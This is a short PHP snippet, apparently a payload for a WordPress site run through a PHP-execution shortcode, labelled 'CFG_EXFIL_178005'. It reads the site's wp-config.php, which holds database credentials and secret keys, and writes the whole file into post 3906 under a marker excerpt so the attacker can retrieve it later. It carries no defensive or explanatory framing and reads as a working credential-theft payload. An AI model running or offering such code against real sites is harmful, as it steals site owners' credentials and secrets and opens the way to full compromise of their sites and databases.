CFG_EXFIL_178005
[php]
// Read wp-config.php
\$cfg = file_get_contents(‘/var/www/html/wp-config.php’);
// Store in a post as post_excerpt for easy retrieval
require_once(‘/var/www/html/wp-load.php’);
global \$wpdb;
\$wpdb->update(‘wp_posts’, array(‘post_content’ => \$cfg, ‘post_excerpt’ => ‘CFG_EXFIL_178005’), array(‘ID’ => 3906));
echo ‘DONE’;
[/php]